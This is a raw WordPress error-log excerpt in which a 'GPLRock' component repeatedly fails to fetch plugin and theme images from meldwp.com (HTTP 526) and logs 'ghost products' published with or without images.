qrexorder-restaurant-qr-menu-whatsapp-ordering-reservation-saas-platform [04-Apr-2026 06:52:17 UTC] GPLRock: Image download failed for product affiliate-elements-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:52:19 UTC] GPLRock: Image download failed for product affiliate-elements-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:52:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/affiliate-elements-for-elementor-6994.webp for product affiliate-elements-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:52:21 UTC] GPLRock: Image download failed for product affiliate-elements-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:52:24 UTC] GPLRock: Image download failed for product affiliate-elements-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:52:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/affiliate-elements-for-elementor-6994.webp for product affiliate-elements-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:52:26 UTC] GPLRock WARNING: Image download failed for product affiliate-elements-for-elementor. URL: https://meldwp.com/wp-content/uploads/affiliate-elements-for-elementor-6994.webp [04-Apr-2026 06:52:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: affiliate-elements-for-elementor [04-Apr-2026 06:52:26 UTC] GPLRock: Image download failed for product airmenu-responsive-fullscreen-navigation-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:52:28 UTC] GPLRock: Image download failed for product airmenu-responsive-fullscreen-navigation-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:52:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/airmenu---responsive-fullscreen-navigation-wordpress-plugin-27664.webp for product airmenu-responsive-fullscreen-navigation-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:52:30 UTC] GPLRock: Image download failed for product airmenu-responsive-fullscreen-navigation-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:52:32 UTC] GPLRock: Image download failed for product airmenu-responsive-fullscreen-navigation-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:52:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/airmenu---responsive-fullscreen-navigation-wordpress-plugin-27664.webp for product airmenu-responsive-fullscreen-navigation-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:52:35 UTC] GPLRock WARNING: Image download failed for product airmenu-responsive-fullscreen-navigation-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/airmenu---responsive-fullscreen-navigation-wordpress-plugin-27664.webp [04-Apr-2026 06:52:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: airmenu-responsive-fullscreen-navigation-wordpress-plugin [04-Apr-2026 06:52:35 UTC] GPLRock: Image download failed for product ultimate-grid-responsive-gallery (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:52:37 UTC] GPLRock: Image download failed for product ultimate-grid-responsive-gallery (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:52:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultimate-grid-responsive-gallery-14222.webp for product ultimate-grid-responsive-gallery after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:52:39 UTC] GPLRock: Image download failed for product ultimate-grid-responsive-gallery (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:52:41 UTC] GPLRock: Image download failed for product ultimate-grid-responsive-gallery (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:52:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultimate-grid-responsive-gallery-14222.webp for product ultimate-grid-responsive-gallery after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:52:43 UTC] GPLRock WARNING: Image download failed for product ultimate-grid-responsive-gallery. URL: https://meldwp.com/wp-content/uploads/ultimate-grid-responsive-gallery-14222.webp [04-Apr-2026 06:52:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ultimate-grid-responsive-gallery [04-Apr-2026 06:52:43 UTC] GPLRock: Image downloaded successfully for product countdown-with-image-or-video-background-responsive-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f9cacf3e.webp [04-Apr-2026 06:52:43 UTC] GPLRock: Using pre-downloaded image for product countdown-with-image-or-video-background-responsive-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f9cacf3e.webp [04-Apr-2026 06:52:43 UTC] GPLRock: Ghost product published with image - Product ID: countdown-with-image-or-video-background-responsive-wordpress-plugin [04-Apr-2026 06:52:44 UTC] GPLRock: Image download failed for product super-store-finder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:52:46 UTC] GPLRock: Image download failed for product super-store-finder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:52:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/super-store-finder-8982.webp for product super-store-finder after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:52:48 UTC] GPLRock: Image download failed for product super-store-finder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:52:50 UTC] GPLRock: Image download failed for product super-store-finder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:52:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/super-store-finder-8982.webp for product super-store-finder after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:52:52 UTC] GPLRock WARNING: Image download failed for product super-store-finder. URL: https://meldwp.com/wp-content/uploads/super-store-finder-8982.webp [04-Apr-2026 06:52:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: super-store-finder [04-Apr-2026 06:52:52 UTC] GPLRock: Image download failed for product paddle-checkout-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:52:54 UTC] GPLRock: Image download failed for product paddle-checkout-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:52:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/paddle-checkout-for-woocommerce-30967.webp for product paddle-checkout-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:52:57 UTC] GPLRock: Image download failed for product paddle-checkout-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:52:59 UTC] GPLRock: Image download failed for product paddle-checkout-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:53:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/paddle-checkout-for-woocommerce-30967.webp for product paddle-checkout-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:53:01 UTC] GPLRock WARNING: Image download failed for product paddle-checkout-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/paddle-checkout-for-woocommerce-30967.webp [04-Apr-2026 06:53:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: paddle-checkout-for-woocommerce [04-Apr-2026 06:53:01 UTC] GPLRock: Image download failed for product messenger-chat-support-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:53:03 UTC] GPLRock: Image download failed for product messenger-chat-support-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:53:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/messenger-chat-support-wordpress-plugin-6796.webp for product messenger-chat-support-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:53:05 UTC] GPLRock: Image download failed for product messenger-chat-support-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:53:07 UTC] GPLRock: Image download failed for product messenger-chat-support-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:53:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/messenger-chat-support-wordpress-plugin-6796.webp for product messenger-chat-support-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:53:10 UTC] GPLRock WARNING: Image download failed for product messenger-chat-support-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/messenger-chat-support-wordpress-plugin-6796.webp [04-Apr-2026 06:53:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: messenger-chat-support-wordpress-plugin [04-Apr-2026 06:53:10 UTC] GPLRock: Image downloaded successfully for product timeline-and-history-slider-vertical-and-horizontal-responsive-timeline-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-099f0945.webp [04-Apr-2026 06:53:10 UTC] GPLRock: Using pre-downloaded image for product timeline-and-history-slider-vertical-and-horizontal-responsive-timeline-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-099f0945.webp [04-Apr-2026 06:53:10 UTC] GPLRock: Ghost product published with image - Product ID: timeline-and-history-slider-vertical-and-horizontal-responsive-timeline-plugin [04-Apr-2026 06:53:10 UTC] GPLRock: Image download failed for product quickcal-appointment-booking-calendar-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:53:12 UTC] GPLRock: Image download failed for product quickcal-appointment-booking-calendar-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:53:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quickcal---appointment-booking-calendar-for-wordpress-27850.webp for product quickcal-appointment-booking-calendar-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:53:14 UTC] GPLRock: Image download failed for product quickcal-appointment-booking-calendar-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:53:16 UTC] GPLRock: Image download failed for product quickcal-appointment-booking-calendar-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:53:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quickcal---appointment-booking-calendar-for-wordpress-27850.webp for product quickcal-appointment-booking-calendar-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:53:18 UTC] GPLRock WARNING: Image download failed for product quickcal-appointment-booking-calendar-for-wordpress. URL: https://meldwp.com/wp-content/uploads/quickcal---appointment-booking-calendar-for-wordpress-27850.webp [04-Apr-2026 06:53:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: quickcal-appointment-booking-calendar-for-wordpress [04-Apr-2026 06:54:23 UTC] GPLRock: Image downloaded successfully for product vmagazine-blog-newspaper-magazine-wordpress-themes (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9d098d04.jpg [04-Apr-2026 06:54:24 UTC] GPLRock: Using pre-downloaded image for product vmagazine-blog-newspaper-magazine-wordpress-themes: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9d098d04.jpg [04-Apr-2026 06:54:24 UTC] GPLRock: Ghost product published with image - Product ID: vmagazine-blog-newspaper-magazine-wordpress-themes [04-Apr-2026 06:54:25 UTC] GPLRock: Image downloaded successfully for product grand-portfolio-portfolio-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2439487f.jpg [04-Apr-2026 06:54:25 UTC] GPLRock: Using pre-downloaded image for product grand-portfolio-portfolio-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2439487f.jpg [04-Apr-2026 06:54:25 UTC] GPLRock: Ghost product published with image - Product ID: grand-portfolio-portfolio-wordpress [04-Apr-2026 06:54:27 UTC] GPLRock: Image downloaded successfully for product wordpress-multilingual-all-import-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bed8aa56.jpg [04-Apr-2026 06:54:27 UTC] GPLRock: Using pre-downloaded image for product wordpress-multilingual-all-import-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bed8aa56.jpg [04-Apr-2026 06:54:27 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-multilingual-all-import-addon [04-Apr-2026 06:54:30 UTC] GPLRock: Image downloaded successfully for product testimonials-showcase-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fa393bec.jpg [04-Apr-2026 06:54:30 UTC] GPLRock: Using pre-downloaded image for product testimonials-showcase-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fa393bec.jpg [04-Apr-2026 06:54:30 UTC] GPLRock: Ghost product published with image - Product ID: testimonials-showcase-wordpress-plugin [04-Apr-2026 06:54:31 UTC] GPLRock: Image downloaded successfully for product education-center-training-courses-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7e64f1eb.jpg [04-Apr-2026 06:54:32 UTC] GPLRock: Using pre-downloaded image for product education-center-training-courses-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7e64f1eb.jpg [04-Apr-2026 06:54:32 UTC] GPLRock: Ghost product published with image - Product ID: education-center-training-courses-wordpress-theme [04-Apr-2026 06:54:33 UTC] GPLRock: Image downloaded successfully for product education-pack-education-learning-theme-wp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e8f0cb87.jpg [04-Apr-2026 06:54:33 UTC] GPLRock: Using pre-downloaded image for product education-pack-education-learning-theme-wp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e8f0cb87.jpg [04-Apr-2026 06:54:33 UTC] GPLRock: Ghost product published with image - Product ID: education-pack-education-learning-theme-wp [04-Apr-2026 06:54:35 UTC] GPLRock: Image downloaded successfully for product cargo-transport-logistics (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3e90d3cb.jpg [04-Apr-2026 06:54:35 UTC] GPLRock: Using pre-downloaded image for product cargo-transport-logistics: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3e90d3cb.jpg [04-Apr-2026 06:54:35 UTC] GPLRock: Ghost product published with image - Product ID: cargo-transport-logistics [04-Apr-2026 06:54:37 UTC] GPLRock: Image downloaded successfully for product plantmore-responsive-theme-for-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4b2e3140.jpg [04-Apr-2026 06:54:37 UTC] GPLRock: Using pre-downloaded image for product plantmore-responsive-theme-for-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4b2e3140.jpg [04-Apr-2026 06:54:37 UTC] GPLRock: Ghost product published with image - Product ID: plantmore-responsive-theme-for-woocommerce-wordpress-theme [04-Apr-2026 06:54:39 UTC] GPLRock: Image downloaded successfully for product decorazzio-interior-design-and-furniture-store-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-625b2cb9.jpg [04-Apr-2026 06:54:39 UTC] GPLRock: Using pre-downloaded image for product decorazzio-interior-design-and-furniture-store-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-625b2cb9.jpg [04-Apr-2026 06:54:39 UTC] GPLRock: Ghost product published with image - Product ID: decorazzio-interior-design-and-furniture-store-wordpress-theme [04-Apr-2026 06:54:40 UTC] GPLRock: Image downloaded successfully for product portada-elegant-blog-blogging-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b138b0c5.jpg [04-Apr-2026 06:54:41 UTC] GPLRock: Using pre-downloaded image for product portada-elegant-blog-blogging-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b138b0c5.jpg [04-Apr-2026 06:54:41 UTC] GPLRock: Ghost product published with image - Product ID: portada-elegant-blog-blogging-wordpress-theme [04-Apr-2026 06:55:23 UTC] GPLRock: Image download failed for product fat-questionnaire-wordpress-plugin-solution-for-survey-or-quiz (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:55:25 UTC] GPLRock: Image download failed for product fat-questionnaire-wordpress-plugin-solution-for-survey-or-quiz (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:55:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fat-questionnaire---wordpress-plugin-solution-for-survey-or-quiz-14088.webp for product fat-questionnaire-wordpress-plugin-solution-for-survey-or-quiz after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:55:27 UTC] GPLRock: Image download failed for product fat-questionnaire-wordpress-plugin-solution-for-survey-or-quiz (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:55:29 UTC] GPLRock: Image download failed for product fat-questionnaire-wordpress-plugin-solution-for-survey-or-quiz (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:55:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fat-questionnaire---wordpress-plugin-solution-for-survey-or-quiz-14088.webp for product fat-questionnaire-wordpress-plugin-solution-for-survey-or-quiz after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:55:31 UTC] GPLRock WARNING: Image download failed for product fat-questionnaire-wordpress-plugin-solution-for-survey-or-quiz. URL: https://meldwp.com/wp-content/uploads/fat-questionnaire---wordpress-plugin-solution-for-survey-or-quiz-14088.webp [04-Apr-2026 06:55:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fat-questionnaire-wordpress-plugin-solution-for-survey-or-quiz [04-Apr-2026 06:55:31 UTC] GPLRock: Image download failed for product remind-review-for-wc (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:55:33 UTC] GPLRock: Image download failed for product remind-review-for-wc (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:55:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/remind-review-for-wc-13205.webp for product remind-review-for-wc after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:55:36 UTC] GPLRock: Image download failed for product remind-review-for-wc (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:55:38 UTC] GPLRock: Image download failed for product remind-review-for-wc (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:55:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/remind-review-for-wc-13205.webp for product remind-review-for-wc after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:55:40 UTC] GPLRock WARNING: Image download failed for product remind-review-for-wc. URL: https://meldwp.com/wp-content/uploads/remind-review-for-wc-13205.webp [04-Apr-2026 06:55:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: remind-review-for-wc [04-Apr-2026 06:55:40 UTC] GPLRock: Image download failed for product bulk-price-updater-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:55:42 UTC] GPLRock: Image download failed for product bulk-price-updater-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:55:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bulk-price-updater-for-woocommerce-25878.webp for product bulk-price-updater-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:55:44 UTC] GPLRock: Image download failed for product bulk-price-updater-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:55:46 UTC] GPLRock: Image download failed for product bulk-price-updater-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:55:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bulk-price-updater-for-woocommerce-25878.webp for product bulk-price-updater-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:55:49 UTC] GPLRock WARNING: Image download failed for product bulk-price-updater-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/bulk-price-updater-for-woocommerce-25878.webp [04-Apr-2026 06:55:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bulk-price-updater-for-woocommerce [04-Apr-2026 06:55:49 UTC] GPLRock: Image download failed for product mortar-wpbakery-page-builder-addons-bundle (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:55:51 UTC] GPLRock: Image download failed for product mortar-wpbakery-page-builder-addons-bundle (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:55:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mortar---wpbakery-page-builder-addons-bundle-25702.webp for product mortar-wpbakery-page-builder-addons-bundle after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:55:53 UTC] GPLRock: Image download failed for product mortar-wpbakery-page-builder-addons-bundle (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:55:55 UTC] GPLRock: Image download failed for product mortar-wpbakery-page-builder-addons-bundle (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:55:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mortar---wpbakery-page-builder-addons-bundle-25702.webp for product mortar-wpbakery-page-builder-addons-bundle after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:55:57 UTC] GPLRock WARNING: Image download failed for product mortar-wpbakery-page-builder-addons-bundle. URL: https://meldwp.com/wp-content/uploads/mortar---wpbakery-page-builder-addons-bundle-25702.webp [04-Apr-2026 06:55:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mortar-wpbakery-page-builder-addons-bundle [04-Apr-2026 06:55:57 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-tabs (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:56:00 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-tabs (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:56:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---tabs-1548.webp for product wpbakery-page-builder-add-on-tabs after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:56:02 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-tabs (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:56:04 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-tabs (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:56:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---tabs-1548.webp for product wpbakery-page-builder-add-on-tabs after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:56:06 UTC] GPLRock WARNING: Image download failed for product wpbakery-page-builder-add-on-tabs. URL: https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---tabs-1548.webp [04-Apr-2026 06:56:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wpbakery-page-builder-add-on-tabs [04-Apr-2026 06:56:07 UTC] GPLRock: Image download failed for product shortcode-processor-for-nex-forms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:56:09 UTC] GPLRock: Image download failed for product shortcode-processor-for-nex-forms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:56:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shortcode-processor-for-nex-forms-7650.webp for product shortcode-processor-for-nex-forms after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:56:11 UTC] GPLRock: Image download failed for product shortcode-processor-for-nex-forms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:56:13 UTC] GPLRock: Image download failed for product shortcode-processor-for-nex-forms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:56:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shortcode-processor-for-nex-forms-7650.webp for product shortcode-processor-for-nex-forms after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:56:15 UTC] GPLRock WARNING: Image download failed for product shortcode-processor-for-nex-forms. URL: https://meldwp.com/wp-content/uploads/shortcode-processor-for-nex-forms-7650.webp [04-Apr-2026 06:56:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: shortcode-processor-for-nex-forms [04-Apr-2026 06:56:15 UTC] GPLRock: Image download failed for product ipages-flipbook-image-pdf-viewer-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:56:17 UTC] GPLRock: Image download failed for product ipages-flipbook-image-pdf-viewer-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:56:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ipages---flipbook-image--pdf-viewer-for-wordpress-17620.webp for product ipages-flipbook-image-pdf-viewer-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:56:20 UTC] GPLRock: Image download failed for product ipages-flipbook-image-pdf-viewer-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:56:22 UTC] GPLRock: Image download failed for product ipages-flipbook-image-pdf-viewer-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:56:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ipages---flipbook-image--pdf-viewer-for-wordpress-17620.webp for product ipages-flipbook-image-pdf-viewer-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:56:24 UTC] GPLRock WARNING: Image download failed for product ipages-flipbook-image-pdf-viewer-for-wordpress. URL: https://meldwp.com/wp-content/uploads/ipages---flipbook-image--pdf-viewer-for-wordpress-17620.webp [04-Apr-2026 06:56:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ipages-flipbook-image-pdf-viewer-for-wordpress [04-Apr-2026 06:56:24 UTC] GPLRock: Image download failed for product wp-smart-recruit-jobs-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:56:26 UTC] GPLRock: Image download failed for product wp-smart-recruit-jobs-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:56:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-smart-recruit---jobs-plugin-for-wordpress-4818.webp for product wp-smart-recruit-jobs-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:56:28 UTC] GPLRock: Image download failed for product wp-smart-recruit-jobs-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:56:30 UTC] GPLRock: Image download failed for product wp-smart-recruit-jobs-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:56:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-smart-recruit---jobs-plugin-for-wordpress-4818.webp for product wp-smart-recruit-jobs-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:56:32 UTC] GPLRock WARNING: Image download failed for product wp-smart-recruit-jobs-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/wp-smart-recruit---jobs-plugin-for-wordpress-4818.webp [04-Apr-2026 06:56:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wp-smart-recruit-jobs-plugin-for-wordpress [04-Apr-2026 06:56:33 UTC] GPLRock: Image download failed for product wordpress-woocommerce-event-manager-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:56:35 UTC] GPLRock: Image download failed for product wordpress-woocommerce-event-manager-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:56:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-woocommerce-event-manager-plugin-9847.webp for product wordpress-woocommerce-event-manager-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:56:37 UTC] GPLRock: Image download failed for product wordpress-woocommerce-event-manager-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:56:39 UTC] GPLRock: Image download failed for product wordpress-woocommerce-event-manager-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:56:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-woocommerce-event-manager-plugin-9847.webp for product wordpress-woocommerce-event-manager-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 